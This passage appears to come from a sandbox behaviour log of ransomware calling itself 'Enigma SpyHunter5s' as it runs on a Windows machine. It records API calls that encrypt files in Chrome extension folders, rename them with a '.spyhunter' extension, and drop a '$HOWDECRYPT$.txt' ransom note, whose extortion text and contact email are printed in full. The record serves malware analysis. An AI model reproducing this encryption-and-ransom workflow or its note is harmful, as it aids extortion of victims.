Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.spyhunter")) returned 1 [0160.298] GetProcessHeap () returned 0x2c0000 [0160.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.298] GetProcessHeap () returned 0x2c0000 [0160.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.298] GetProcessHeap () returned 0x2c0000 [0160.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a4c0 | out: hHeap=0x2c0000) returned 1 [0160.298] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea10 | out: pbBuffer=0x270ea10) returned 1 [0160.298] GetProcessHeap () returned 0x2c0000 [0160.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.298] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea08*=0x30) returned 1 [0160.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json") returned 155 [0160.299] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.299] GetProcessHeap () returned 0x2c0000 [0160.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.299] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e9cc*=0x96, lpOverlapped=0x0) returned 1 [0160.301] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.301] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e9cc*=0x96, lpOverlapped=0x0) returned 1 [0160.301] GetProcessHeap () returned 0x2c0000 [0160.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.301] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.301] WriteFile (in: hFile=0x178, lpBuffer=0x270ea0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x270ea0c*, lpNumberOfBytesWritten=0x270e9cc*=0x4, lpOverlapped=0x0) returned 1 [0160.301] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9cc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9cc*=0x30, lpOverlapped=0x0) returned 1 [0160.302] CloseHandle (hObject=0x178) returned 1 [0160.302] GetProcessHeap () returned 0x2c0000 [0160.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.302] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.spyhunter") returned 165 [0160.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0160.303] GetProcessHeap () returned 0x2c0000 [0160.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.303] GetProcessHeap () returned 0x2c0000 [0160.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.303] GetProcessHeap () returned 0x2c0000 [0160.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d3d8 | out: hHeap=0x2c0000) returned 1 [0160.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.304] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.304] WriteFile (in: hFile=0x178, lpBuffer=0x270e93f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea68, lpOverlapped=0x0 | out: lpBuffer=0x270e93f*, lpNumberOfBytesWritten=0x270ea68*=0x127, lpOverlapped=0x0) returned 1 [0160.305] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.305] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea68*=0x2ac, lpOverlapped=0x0) returned 1 [0160.305] CloseHandle (hObject=0x178) returned 1 [0160.305] GetProcessHeap () returned 0x2c0000 [0160.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d250 | out: hHeap=0x2c0000) returned 1 [0160.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea08 | out: pbBuffer=0x270ea08) returned 1 [0160.305] GetProcessHeap () returned 0x2c0000 [0160.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea00*=0x30) returned 1 [0160.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json") returned 155 [0160.307] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.307] GetProcessHeap () returned 0x2c0000 [0160.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.307] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e9c4*=0xb1, lpOverlapped=0x0) returned 1 [0160.308] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.308] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x270e9c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e9c4*=0xb1, lpOverlapped=0x0) returned 1 [0160.308] GetProcessHeap () returned 0x2c0000 [0160.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.309] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.309] WriteFile (in: hFile=0x178, lpBuffer=0x270ea04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9c4, lpOverlapped=0x0 | out: lpBuffer=0x270ea04*, lpNumberOfBytesWritten=0x270e9c4*=0x4, lpOverlapped=0x0) returned 1 [0160.309] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9c4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9c4*=0x30, lpOverlapped=0x0) returned 1 [0160.309] CloseHandle (hObject=0x178) returned 1 [0160.309] GetProcessHeap () returned 0x2c0000 [0160.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.309] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.spyhunter") returned 165 [0160.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.spyhunter")) returned 1 [0160.310] GetProcessHeap () returned 0x2c0000 [0160.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.311] GetProcessHeap () returned 0x2c0000 [0160.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.311] GetProcessHeap () returned 0x2c0000 [0160.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d0c8 | out: hHeap=0x2c0000) returned 1 [0160.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.312] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.312] WriteFile (in: hFile=0x178, lpBuffer=0x270e937*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea60, lpOverlapped=0x0 | out: lpBuffer=0x270e937*, lpNumberOfBytesWritten=0x270ea60*=0x127, lpOverlapped=0x0) returned 1 [0160.312] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.312] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea60, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea60*=0x2ac, lpOverlapped=0x0) returned 1 [0160.313] CloseHandle (hObject=0x178) returned 1 [0160.313] GetProcessHeap () returned 0x2c0000 [0160.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cf40 | out: hHeap=0x2c0000) returned 1 [0160.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea00 | out: pbBuffer=0x270ea00) returned 1 [0160.313] GetProcessHeap () returned 0x2c0000 [0160.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9f8*=0x30) returned 1 [0160.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.314] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0160.314] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.314] GetProcessHeap () returned 0x2c0000 [0160.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.314] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e9bc*=0x20b, lpOverlapped=0x0) returned 1 [0160.315] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdf5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.315] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x20b, lpNumberOfBytesWritten=0x270e9bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e9bc*=0x20b, lpOverlapped=0x0) returned 1 [0160.322] GetProcessHeap () returned 0x2c0000 [0160.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.322] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.322] WriteFile (in: hFile=0x178, lpBuffer=0x270e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9bc, lpOverlapped=0x0 | out: lpBuffer=0x270e9fc*, lpNumberOfBytesWritten=0x270e9bc*=0x4, lpOverlapped=0x0) returned 1 [0160.322] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9bc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9bc*=0x30, lpOverlapped=0x0) returned 1 [0160.323] CloseHandle (hObject=0x178) returned 1 [0160.323] GetProcessHeap () returned 0x2c0000 [0160.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.323] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.spyhunter") returned 165 [0160.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.spyhunter")) returned 1 [0160.324] GetProcessHeap () returned 0x2c0000 [0160.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.324] GetProcessHeap () returned 0x2c0000 [0160.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.324] GetProcessHeap () returned 0x2c0000 [0160.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6cdb8 | out: hHeap=0x2c0000) returned 1 [0160.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.325] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.325] WriteFile (in: hFile=0x178, lpBuffer=0x270e92f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea58, lpOverlapped=0x0 | out: lpBuffer=0x270e92f*, lpNumberOfBytesWritten=0x270ea58*=0x127, lpOverlapped=0x0) returned 1 [0160.326] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.326] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea58*=0x2ac, lpOverlapped=0x0) returned 1 [0160.326] CloseHandle (hObject=0x178) returned 1 [0160.326] GetProcessHeap () returned 0x2c0000 [0160.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc91e8 | out: hHeap=0x2c0000) returned 1 [0160.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9f8 | out: pbBuffer=0x270e9f8) returned 1 [0160.326] GetProcessHeap () returned 0x2c0000 [0160.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9f0*=0x30) returned 1 [0160.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0160.327] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.328] GetProcessHeap () returned 0x2c0000 [0160.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.328] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e9b4*=0xcb, lpOverlapped=0x0) returned 1 [0160.328] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff35, 